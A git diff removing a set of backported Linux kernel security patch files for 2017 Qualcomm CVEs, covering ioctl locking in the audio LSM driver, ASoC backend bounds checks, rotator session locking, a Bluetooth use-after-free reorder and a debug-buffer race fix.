-From 143ef972be1621458930ea3fc1def5ebce7b0c5d Mon Sep 17 00:00:00 2001
-From: Yeleswarapu Nagaradhesh <nagaradh@codeaurora.org>
-Date: Tue, 14 Feb 2017 14:27:56 +0530
-Subject: ASoC: msm: acquire lock in ioctl
-
-If two ioctls are triggered with different commands,
-there is a possibility to access freed confidence level
-memory. To resolve this acquire lock in ioctl.
-Also release mutex lock properly in error cases.
-
-CRs-Fixed: 1103085
-Change-Id: I7d6b2eff21c8297e5f0755a0c141254be32f777d
-Signed-off-by: Yeleswarapu Nagaradhesh <nagaradh@codeaurora.org>
----
- sound/soc/msm/msm-cpe-lsm.c            |  1 +
- sound/soc/msm/qdsp6v2/msm-lsm-client.c | 93 ++++++++++++++++++++++++----------
- 2 files changed, 68 insertions(+), 26 deletions(-)
-
-diff --git a/sound/soc/msm/msm-cpe-lsm.c b/sound/soc/msm/msm-cpe-lsm.c
-index 7989a1e..3762e02 100644
---- a/sound/soc/msm/msm-cpe-lsm.c
-+++ b/sound/soc/msm/msm-cpe-lsm.c
-@@ -1621,6 +1621,7 @@ static int msm_cpe_lsm_ioctl(struct snd_pcm_substream *substream,
- 	switch (cmd) {
- 	case SNDRV_LSM_REG_SND_MODEL_V2: {
- 		struct snd_lsm_sound_model_v2 snd_model;
-+
- 		if (copy_from_user(&snd_model, (void *)arg,
- 				   sizeof(struct snd_lsm_sound_model_v2))) {
- 			dev_err(rtd->dev,
-diff --git a/sound/soc/msm/qdsp6v2/msm-lsm-client.c b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-index d5358e3..62a4e82 100644
---- a/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-+++ b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2016, Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2017, Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -84,6 +84,7 @@ struct lsm_priv {
- 	atomic_t buf_count;
- 	atomic_t read_abort;
- 	wait_queue_head_t period_wait;
-+	struct mutex lsm_api_lock;
- 	int appl_cnt;
- 	int dma_write;
- };
-@@ -900,10 +901,18 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 	case SNDRV_LSM_EVENT_STATUS:
- 		dev_dbg(rtd->dev, "%s: Get event status\n", __func__);
- 		atomic_set(&prtd->event_wait_stop, 0);
-+
-+		/*
-+		 * Release the api lock before wait to allow
-+		 * other IOCTLs to be invoked while waiting
-+		 * for event
-+		 */
-+		mutex_unlock(&prtd->lsm_api_lock);
- 		rc = wait_event_freezable(prtd->event_wait,
- 				(cmpxchg(&prtd->event_avail, 1, 0) ||
- 				 (xchg = atomic_cmpxchg(&prtd->event_wait_stop,
- 							1, 0))));
-+		mutex_lock(&prtd->lsm_api_lock);
- 		dev_dbg(rtd->dev, "%s: wait_event_freezable %d event_wait_stop %d\n",
- 			 __func__, rc, xchg);
- 		if (!rc && !xchg) {
-@@ -1147,6 +1156,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 	rtd = substream->private_data;
- 	prtd = runtime->private_data;
- 
-+	mutex_lock(&prtd->lsm_api_lock);
-+
- 	switch (cmd) {
- 	case SNDRV_LSM_EVENT_STATUS: {
- 		struct snd_lsm_event_status *user = NULL, userarg32;
-@@ -1154,7 +1165,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 		if (copy_from_user(&userarg32, arg, sizeof(userarg32))) {
- 			dev_err(rtd->dev, "%s: err copyuser ioctl %s\n",
- 				__func__, "SNDRV_LSM_EVENT_STATUS");
--			return -EFAULT;
-+			err = -EFAULT;
-+			goto done;
- 		}
- 
- 		if (userarg32.payload_size >
-@@ -1162,7 +1174,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 			pr_err("%s: payload_size %d is invalid, max allowed = %d\n",
- 				__func__, userarg32.payload_size,
- 				LISTEN_MAX_STATUS_PAYLOAD_SIZE);
--			return -EINVAL;
-+			err = -EINVAL;
-+			goto done;
- 		}
- 
- 		size = sizeof(*user) + userarg32.payload_size;
-@@ -1171,7 +1184,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 			dev_err(rtd->dev,
- 				"%s: Allocation failed event status size %d\n",
- 				__func__, size);
--			return -EFAULT;
-+			err = -EFAULT;
-+			goto done;
- 		} else {
- 			cmd = SNDRV_LSM_EVENT_STATUS;
- 			user->payload_size = userarg32.payload_size;
-@@ -1220,7 +1234,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 			dev_err(rtd->dev,
- 				"%s: %s: not supported if using topology\n",
- 				__func__, "REG_SND_MODEL_V2");
--			return -EINVAL;
-+			err = -EINVAL;
-+			goto done;
- 		}
- 
- 		if (copy_from_user(&snd_modelv232, arg,
-@@ -1261,7 +1276,7 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 			dev_err(rtd->dev,
- 				"%s: %s: not supported if using topology\n",
- 				__func__, "SET_PARAMS_32");
--			return -EINVAL;
-+			err = -EINVAL;
- 		}
- 
- 		if (copy_from_user(&det_params32, arg,
-@@ -1304,7 +1319,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 			dev_err(rtd->dev,
- 				"%s: %s: not supported if not using topology\n",
- 				__func__, "SET_MODULE_PARAMS_32");
--			return -EINVAL;
-+			err = -EINVAL;
-+			goto done;
- 		}
- 
- 		if (copy_from_user(&p_data_32, arg,
-@@ -1313,7 +1329,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 				"%s: %s: copy_from_user failed, size = %zd\n",
- 				__func__, "SET_MODULE_PARAMS_32",
- 				sizeof(p_data_32));
--			return -EFAULT;
-+			err = -EFAULT;
-+			goto done;
- 		}
- 
- 		p_data.params = compat_ptr(p_data_32.params);
-@@ -1325,7 +1342,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 				"%s: %s: Invalid num_params %d\n",
- 				__func__, "SET_MODULE_PARAMS_32",
- 				p_data.num_params);
--			return -EINVAL;
-+			err = -EINVAL;
-+			goto done;
- 		}
- 
- 		if (p_data.data_size !=
-@@ -1334,7 +1352,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 				"%s: %s: Invalid size %d\n",
- 				__func__, "SET_MODULE_PARAMS_32",
- 				p_data.data_size);
--			return -EINVAL;
-+			err = -EINVAL;
-+			goto done;
- 		}
- 
- 		p_size = sizeof(struct lsm_params_info_32) *
-@@ -1345,7 +1364,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 			dev_err(rtd->dev,
- 				"%s: no memory for params32, size = %zd\n",
- 				__func__, p_size);
--			return -ENOMEM;
-+			err = -ENOMEM;
-+			goto done;
- 		}
- 
- 		p_size = sizeof(struct lsm_params_info) * p_data.num_params;
-@@ -1355,7 +1375,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 				"%s: no memory for params, size = %zd\n",
- 				__func__, p_size);
- 			kfree(params32);
--			return -ENOMEM;
-+			err = -ENOMEM;
-+			goto done;
- 		}
- 
- 		if (copy_from_user(params32, p_data.params,
-@@ -1365,7 +1386,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 				__func__, "params32", p_data.data_size);
- 			kfree(params32);
- 			kfree(params);
--			return -EFAULT;
-+			err = -EFAULT;
-+			goto done;
- 		}
- 
- 		p_info_32 = (struct lsm_params_info_32 *) params32;
-@@ -1408,6 +1430,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 		err = msm_lsm_ioctl_shared(substream, cmd, arg);
- 		break;
- 	}
-+done:
-+	mutex_unlock(&prtd->lsm_api_lock);
- 	return err;
- }
- #else
-@@ -1432,6 +1456,7 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 	prtd = runtime->private_data;
- 	rtd = substream->private_data;
- 
-+	mutex_lock(&prtd->lsm_api_lock);
- 	switch (cmd) {
- 	case SNDRV_LSM_REG_SND_MODEL_V2: {
- 		struct snd_lsm_sound_model_v2 snd_model_v2;
-@@ -1440,7 +1465,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 			dev_err(rtd->dev,
- 				"%s: %s: not supported if using topology\n",
- 				__func__, "REG_SND_MODEL_V2");
--			return -EINVAL;
-+			err = -EINVAL;
-+			goto done;
- 		}
- 
- 		if (copy_from_user(&snd_model_v2, arg, sizeof(snd_model_v2))) {
-@@ -1467,7 +1493,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 			dev_err(rtd->dev,
- 				"%s: %s: not supported if using topology\n",
- 				__func__, "SET_PARAMS");
--			return -EINVAL;
-+			err = -EINVAL;
-+			goto done;
- 		}
- 
- 		pr_debug("%s: SNDRV_LSM_SET_PARAMS\n", __func__);
-@@ -1488,7 +1515,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 			dev_err(rtd->dev,
- 				"%s: LSM_SET_PARAMS failed, err %d\n",
- 				__func__, err);
--		return err;
-+
-+		goto done;
- 	}
- 
- 	case SNDRV_LSM_SET_MODULE_PARAMS: {
-@@ -1500,7 +1528,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 			dev_err(rtd->dev,
- 				"%s: %s: not supported if not using topology\n",
- 				__func__, "SET_MODULE_PARAMS");
--			return -EINVAL;
-+			err = -EINVAL;
-+			goto done;
- 		}
- 
- 		if (copy_from_user(&p_data, arg,
-@@ -1508,7 +1537,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 			dev_err(rtd->dev,
- 				"%s: %s: copy_from_user failed, size = %zd\n",
- 				__func__, "p_data", sizeof(p_data));
--			return -EFAULT;
-+			err = -EFAULT;
-+			goto done;
- 		}
- 
- 		if (p_data.num_params > LSM_PARAMS_MAX) {
-@@ -1516,7 +1546,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 				"%s: %s: Invalid num_params %d\n",
- 				__func__, "SET_MODULE_PARAMS",
- 				p_data.num_params);
--			return -EINVAL;
-+			err = -EINVAL;
-+			goto done;
- 		}
- 
- 		p_size = p_data.num_params *
-@@ -1527,7 +1558,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 				"%s: %s: Invalid size %zd\n",
- 				__func__, "SET_MODULE_PARAMS", p_size);
- 
--			return -EFAULT;
-+			err = -EFAULT;
-+			goto done;
- 		}
- 
- 		params = kzalloc(p_size, GFP_KERNEL);
-@@ -1535,7 +1567,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 			dev_err(rtd->dev,
- 				"%s: no memory for params\n",
- 				__func__);
--			return -ENOMEM;
-+			err = -ENOMEM;
-+			goto done;
- 		}
- 
- 		if (copy_from_user(params, p_data.params,
-@@ -1544,7 +1577,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 				"%s: %s: copy_from_user failed, size = %d\n",
- 				__func__, "params", p_data.data_size);
- 			kfree(params);
--			return -EFAULT;
-+			err = -EFAULT;
-+			goto done;
- 		}
- 
- 		err = msm_lsm_process_params(substream, &p_data, params);
-@@ -1564,7 +1598,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 			dev_err(rtd->dev,
- 				"%s: err copyuser event_status\n",
- 				__func__);
--			return -EFAULT;
-+			err = -EFAULT;
-+			goto done;
- 		}
- 
- 		if (userarg.payload_size >
-@@ -1572,7 +1607,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 			pr_err("%s: payload_size %d is invalid, max allowed = %d\n",
- 				__func__, userarg.payload_size,
- 				LISTEN_MAX_STATUS_PAYLOAD_SIZE);
--			return -EINVAL;
-+			err = -EINVAL;
-+			goto done;
- 		}
- 
- 		size = sizeof(struct snd_lsm_event_status) +
-@@ -1582,7 +1618,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 			dev_err(rtd->dev,
- 				"%s: Allocation failed event status size %d\n",
- 				__func__, size);
--			return -EFAULT;
-+			err = -EFAULT;
-+			goto done;
- 		} else {
- 			user->payload_size = userarg.payload_size;
- 			err = msm_lsm_ioctl_shared(substream, cmd, user);
-@@ -1605,12 +1642,14 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 		if (err)
- 			dev_err(rtd->dev,
- 				"%s: lsmevent failed %d", __func__, err);
--		return err;
-+		goto done;
- 	}
- 	default:
- 		err = msm_lsm_ioctl_shared(substream, cmd, arg);
- 	break;
- 	}
-+done:
-+	mutex_unlock(&prtd->lsm_api_lock);
- 	return err;
- }
- 
-@@ -1627,6 +1666,7 @@ static int msm_lsm_open(struct snd_pcm_substream *substream)
- 		       __func__);
- 		return -ENOMEM;
- 	}
-+	mutex_init(&prtd->lsm_api_lock);
- 	spin_lock_init(&prtd->event_lock);
- 	init_waitqueue_head(&prtd->event_wait);
- 	init_waitqueue_head(&prtd->period_wait);
-@@ -1776,6 +1816,7 @@ static int msm_lsm_close(struct snd_pcm_substream *substream)
- 	kfree(prtd->event_status);
- 	prtd->event_status = NULL;
- 	spin_unlock_irqrestore(&prtd->event_lock, flags);
-+	mutex_destroy(&prtd->lsm_api_lock);
- 	kfree(prtd);
- 	runtime->private_data = NULL;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7369/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-7369/3.10/0001.patch
deleted file mode 100644
index 46098299..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7369/3.10/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 75ed08a822cf378ffed0d2f177d06555bd77a006 Mon Sep 17 00:00:00 2001
-From: Walter Yang <yandongy@codeaurora.org>
-Date: Thu, 2 Mar 2017 12:13:34 +0800
-Subject: ASoC: Add backend user count checking
-
-Add backend user count checking to protect the index
-boundary.
-
-Change-Id: Ic1b61d1f7130252cc54da0b16553858714988dbd
-CRs-Fixed: 2009216
-Signed-off-by: Walter Yang <yandongy@codeaurora.org>
----
- sound/soc/soc-compress.c | 5 +++++
- sound/soc/soc-pcm.c      | 4 ++++
- 2 files changed, 9 insertions(+)
-
-diff --git a/sound/soc/soc-compress.c b/sound/soc/soc-compress.c
-index 8902662..3b30818 100644
---- a/sound/soc/soc-compress.c
-+++ b/sound/soc/soc-compress.c
-@@ -569,6 +569,11 @@ static int soc_compr_set_params_fe(struct snd_compr_stream *cstream,
- 				cstream, &async_domain);
- 			} else {
- 				be_list[j++] = be;
-+				if (j == DPCM_MAX_BE_USERS) {
-+					dev_dbg(fe->dev,
-+						"ASoC: MAX backend users!\n");
-+					break;
-+				}
- 			}
- 		}
- 		for (i = 0; i < j; i++) {
-diff --git a/sound/soc/soc-pcm.c b/sound/soc/soc-pcm.c
-index 7e2b2f3..21e503c 100644
---- a/sound/soc/soc-pcm.c
-+++ b/sound/soc/soc-pcm.c
-@@ -1851,6 +1851,10 @@ void dpcm_be_dai_prepare_async(struct snd_soc_pcm_runtime *fe, int stream,
- 							    dpcm, domain);
- 		} else {
- 			dpcm_async[i++] = dpcm;
-+			if (i == DPCM_MAX_BE_USERS) {
-+				dev_dbg(fe->dev, "ASoC: MAX backend users!\n");
-+				break;
-+			}
- 		}
- 	}
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7369/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-7369/3.18/0002.patch
deleted file mode 100644
index 2af50f01..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7369/3.18/0002.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From ae8f1d5f60644983aba7fbab469d0e542a187c6e Mon Sep 17 00:00:00 2001
-From: Walter Yang <yandongy@codeaurora.org>
-Date: Thu, 2 Mar 2017 12:13:34 +0800
-Subject: ASoC: Add backend user count checking
-
-Add backend user count checking to protect the index
-boundary.
-
-Change-Id: Ic1b61d1f7130252cc54da0b16553858714988dbd
-CRs-Fixed: 2009216
-Signed-off-by: Walter Yang <yandongy@codeaurora.org>
----
- sound/soc/soc-compress.c | 5 +++++
- sound/soc/soc-pcm.c      | 4 ++++
- 2 files changed, 9 insertions(+)
-
-diff --git a/sound/soc/soc-compress.c b/sound/soc/soc-compress.c
-index 832f221f..a56e2e5 100644
---- a/sound/soc/soc-compress.c
-+++ b/sound/soc/soc-compress.c
-@@ -533,6 +533,11 @@ static int soc_compr_set_params_fe(struct snd_compr_stream *cstream,
- 				cstream, &async_domain);
- 			} else {
- 				be_list[j++] = be;
-+				if (j == DPCM_MAX_BE_USERS) {
-+					dev_dbg(fe->dev,
-+						"ASoC: MAX backend users!\n");
-+					break;
-+				}
- 			}
- 		}
- 		for (i = 0; i < j; i++) {
-diff --git a/sound/soc/soc-pcm.c b/sound/soc/soc-pcm.c
-index 6c44757..e6de6ad 100644
---- a/sound/soc/soc-pcm.c
-+++ b/sound/soc/soc-pcm.c
-@@ -2320,6 +2320,10 @@ void dpcm_be_dai_prepare_async(struct snd_soc_pcm_runtime *fe, int stream,
- 							    dpcm, domain);
- 		} else {
- 			dpcm_async[i++] = dpcm;
-+			if (i == DPCM_MAX_BE_USERS) {
-+				dev_dbg(fe->dev, "ASoC: MAX backend users!\n");
-+				break;
-+			}
- 		}
- 	}
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7369/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-7369/4.4/0003.patch
deleted file mode 100644
index 457e6d96..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7369/4.4/0003.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 05f4374845738d2146075e77d9139e60a558de18 Mon Sep 17 00:00:00 2001
-From: Walter Yang <yandongy@codeaurora.org>
-Date: Thu, 2 Mar 2017 12:13:34 +0800
-Subject: ASoC: Add backend user count checking
-
-Add backend user count checking to protect the index
-boundary.
-
-Change-Id: Ic1b61d1f7130252cc54da0b16553858714988dbd
-CRs-Fixed: 2009216
-Signed-off-by: Walter Yang <yandongy@codeaurora.org>
----
- sound/soc/soc-compress.c | 5 +++++
- sound/soc/soc-pcm.c      | 4 ++++
- 2 files changed, 9 insertions(+)
-
-diff --git a/sound/soc/soc-compress.c b/sound/soc/soc-compress.c
-index eb894d0..736b9c4 100644
---- a/sound/soc/soc-compress.c
-+++ b/sound/soc/soc-compress.c
-@@ -527,6 +527,11 @@ static int soc_compr_set_params_fe(struct snd_compr_stream *cstream,
- 				cstream, &async_domain);
- 			} else {
- 				be_list[j++] = be;
-+				if (j == DPCM_MAX_BE_USERS) {
-+					dev_dbg(fe->dev,
-+						"ASoC: MAX backend users!\n");
-+					break;
-+				}
- 			}
- 		}
- 		for (i = 0; i < j; i++) {
-diff --git a/sound/soc/soc-pcm.c b/sound/soc/soc-pcm.c
-index 13649f9..0ba9dfb 100644
---- a/sound/soc/soc-pcm.c
-+++ b/sound/soc/soc-pcm.c
-@@ -2403,6 +2403,10 @@ void dpcm_be_dai_prepare_async(struct snd_soc_pcm_runtime *fe, int stream,
- 							    dpcm, domain);
- 		} else {
- 			dpcm_async[i++] = dpcm;
-+			if (i == DPCM_MAX_BE_USERS) {
-+				dev_dbg(fe->dev, "ASoC: MAX backend users!\n");
-+				break;
-+			}
- 		}
- 	}
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7370/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7370/ANY/0001.patch
deleted file mode 100644
index ca2c40fc..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7370/ANY/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 970edf007fbe64b094437541a42477d653802d85 Mon Sep 17 00:00:00 2001
-From: Benjamin Chan <bkchan@codeaurora.org>
-Date: Mon, 6 Mar 2017 11:48:27 -0500
-Subject: msm: mdss: Add lock to avoid release of active session in rotator
-
-Add mutex lock to protect an active rotator session from being closed.
-Without the lock, this can happen if a rotator closing IOCTL is
-called from a separate thread.
-
-CRs-Fixed: 2006159
-Change-Id: I927a0c626bdae5ef149e12979ec4befdbac1b7f7
-Signed-off-by: Benjamin Chan <bkchan@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_rotator.c | 5 ++++-
- 1 file changed, 4 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_rotator.c b/drivers/video/msm/mdss/mdss_rotator.c
-index f23a05c..f3c40cf 100644
---- a/drivers/video/msm/mdss/mdss_rotator.c
-+++ b/drivers/video/msm/mdss/mdss_rotator.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -2059,10 +2059,12 @@ static int mdss_rotator_config_session(struct mdss_rot_mgr *mgr,
- 		return ret;
- 	}
- 
-+	mutex_lock(&mgr->lock);
- 	perf = mdss_rotator_find_session(private, config.session_id);
- 	if (!perf) {
- 		pr_err("No session with id=%u could be found\n",
- 			config.session_id);
-+		mutex_unlock(&mgr->lock);
- 		return -EINVAL;
- 	}
- 
-@@ -2085,6 +2087,7 @@ static int mdss_rotator_config_session(struct mdss_rot_mgr *mgr,
- 		config.output.format);
- done:
- 	ATRACE_END(__func__);
-+	mutex_unlock(&mgr->lock);
- 	return ret;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7371/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-7371/3.18/0001.patch
deleted file mode 100644
index 19b01e18..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7371/3.18/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 9d5a0bc7f6318821fddf9fc0ac9a05e58bb00a6b Mon Sep 17 00:00:00 2001
-From: Sungjun Park <sjpark@codeaurora.org>
-Date: Mon, 23 Jan 2017 13:28:44 -0800
-Subject: bluetooth: Fix free data pointer routine
-
-Data pointer has been reused after freed it. So,
-it has been moved to after using the data pointer
-to clean up resource and freed it.
-
-Change-Id: Ibc94e092134ff1f36e896c679ade7f639254a24d
-Signed-off-by: Sungjun Park <sjpark@codeaurora.org>
----
- drivers/bluetooth/btfm_slim.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/bluetooth/btfm_slim.c b/drivers/bluetooth/btfm_slim.c
-index 5fb00b9..1c6e256 100644
---- a/drivers/bluetooth/btfm_slim.c
-+++ b/drivers/bluetooth/btfm_slim.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -509,7 +509,6 @@ static int btfm_slim_remove(struct slim_device *slim)
- 	BTFMSLIM_DBG("");
- 	mutex_destroy(&btfm_slim->io_lock);
- 	mutex_destroy(&btfm_slim->xfer_lock);
--	kfree(btfm_slim);
- 	snd_soc_unregister_codec(&slim->dev);
- 
- 	BTFMSLIM_DBG("slim_remove_device() - btfm_slim->slim_ifd");
-@@ -517,6 +516,8 @@ static int btfm_slim_remove(struct slim_device *slim)
- 
- 	BTFMSLIM_DBG("slim_remove_device() - btfm_slim->slim_pgd");
- 	slim_remove_device(slim);
-+
-+	kfree(btfm_slim);
- 	return 0;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7371/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-7371/4.4/0002.patch
deleted file mode 100644
index ddf667fc..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7371/4.4/0002.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From e02e63b8014f7a0a5ea17a5196fb4ef1283fd1fd Mon Sep 17 00:00:00 2001
-From: Sungjun Park <sjpark@codeaurora.org>
-Date: Mon, 23 Jan 2017 13:28:44 -0800
-Subject: bluetooth: Fix free data pointer routine
-
-Data pointer has been reused after freed it. So,
-it has been moved to after using the data pointer
-to clean up resource and freed it.
-
-Change-Id: Ibc94e092134ff1f36e896c679ade7f639254a24d
-Signed-off-by: Sungjun Park <sjpark@codeaurora.org>
----
- drivers/bluetooth/btfm_slim.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/bluetooth/btfm_slim.c b/drivers/bluetooth/btfm_slim.c
-index a88ae0f..37cc628 100644
---- a/drivers/bluetooth/btfm_slim.c
-+++ b/drivers/bluetooth/btfm_slim.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -512,7 +512,6 @@ static int btfm_slim_remove(struct slim_device *slim)
- 	BTFMSLIM_DBG("");
- 	mutex_destroy(&btfm_slim->io_lock);
- 	mutex_destroy(&btfm_slim->xfer_lock);
--	kfree(btfm_slim);
- 	snd_soc_unregister_codec(&slim->dev);
- 
- 	BTFMSLIM_DBG("slim_remove_device() - btfm_slim->slim_ifd");
-@@ -520,6 +519,8 @@ static int btfm_slim_remove(struct slim_device *slim)
- 
- 	BTFMSLIM_DBG("slim_remove_device() - btfm_slim->slim_pgd");
- 	slim_remove_device(slim);
-+
-+	kfree(btfm_slim);
- 	return 0;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7372/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7372/ANY/0001.patch
deleted file mode 100644
index e13a06c0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7372/ANY/0001.patch
+++ /dev/null
@@ -1,127 +0,0 @@
-From 1806be003731d6d4be55e5b940d14ab772839e13 Mon Sep 17 00:00:00 2001
-From: Rahul Sharma <sharah@codeaurora.org>
-Date: Thu, 19 Jan 2017 17:01:57 +0530
-Subject: msm: ba: Fix race conditions in debug writes
-
-Use dynamic allocation for debug buffer instead of static.
-This is to avoid race condition which can cause buffer overflows.
-
-Change-Id: I1b4eecb4280843064712ee3b7b52e23f55ab53c3
-Signed-off-by: Rahul Sharma <sharah@codeaurora.org>
----
- drivers/video/msm/ba/msm_ba_debug.c | 58 +++++++++++++++++++++++++------------
- 1 file changed, 39 insertions(+), 19 deletions(-)
-
-diff --git a/drivers/video/msm/ba/msm_ba_debug.c b/drivers/video/msm/ba/msm_ba_debug.c
-index a39a0d3..d41d1ab 100644
---- a/drivers/video/msm/ba/msm_ba_debug.c
-+++ b/drivers/video/msm/ba/msm_ba_debug.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2015,2017 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -13,7 +13,7 @@
- 
- #include "msm_ba_debug.h"
- 
--#define MAX_DBG_BUF_SIZE 4096
-+#define MAX_DBG_BUF_SIZE 1008
- 
- int msm_ba_debug = BA_ERR | BA_WARN;
- int msm_ba_debug_out = BA_OUT_PRINTK;
-@@ -24,11 +24,9 @@ struct debug_buffer {
- 	u32 filled_size;
- };
- 
--static struct debug_buffer dbg_buf;
--
- #define INIT_DBG_BUF(__buf) ({ \
--	__buf.curr = __buf.ptr;\
--	__buf.filled_size = 0; \
-+	__buf->curr = __buf->ptr;\
-+	__buf->filled_size = 0; \
- })
- 
- static int dev_info_open(struct inode *inode, struct file *file)
-@@ -58,19 +56,30 @@ static ssize_t dev_info_read(struct file *file, char __user *buf,
- 		size_t count, loff_t *ppos)
- {
- 	struct msm_ba_dev *dev_ctxt = file->private_data;
-+	struct debug_buffer *dbg_buf = NULL;
-+	ssize_t size = 0;
- 
- 	if (!dev_ctxt) {
- 		dprintk(BA_ERR, "Invalid params, dev: 0x%p", dev_ctxt);
- 		return 0;
- 	}
-+
-+	dbg_buf = kmalloc(sizeof(struct debug_buffer), GFP_KERNEL);
-+	if (NULL == dbg_buf)
-+		return 0;
-+
- 	INIT_DBG_BUF(dbg_buf);
--	write_str(&dbg_buf, "===============================");
--	write_str(&dbg_buf, "DEV: 0x%p", dev_ctxt);
--	write_str(&dbg_buf, "===============================");
--	write_str(&dbg_buf, "state: %d", dev_ctxt->state);
-+	write_str(dbg_buf, "===============================");
-+	write_str(dbg_buf, "DEV: 0x%p", dev_ctxt);
-+	write_str(dbg_buf, "===============================");
-+	write_str(dbg_buf, "state: %d", dev_ctxt->state);
- 
--	return simple_read_from_buffer(buf, count, ppos,
--			dbg_buf.ptr, dbg_buf.filled_size);
-+	size = simple_read_from_buffer(buf, count, ppos,
-+			dbg_buf->ptr, dbg_buf->filled_size);
-+
-+	kfree(dbg_buf);
-+
-+	return size;
- }
- 
- static const struct file_operations dev_info_fops = {
-@@ -155,21 +164,32 @@ static ssize_t inst_info_read(struct file *file, char __user *buf,
- 		size_t count, loff_t *ppos)
- {
- 	struct msm_ba_inst *inst = file->private_data;
-+	struct debug_buffer *dbg_buf = NULL;
-+	ssize_t size = 0;
- 
- 	if (!inst) {
- 		dprintk(BA_ERR, "Invalid params, dev: %p", inst);
- 		return 0;
- 	}
-+
-+	dbg_buf = kmalloc(sizeof(struct debug_buffer), GFP_KERNEL);
-+	if (NULL == dbg_buf)
-+		return 0;
-+
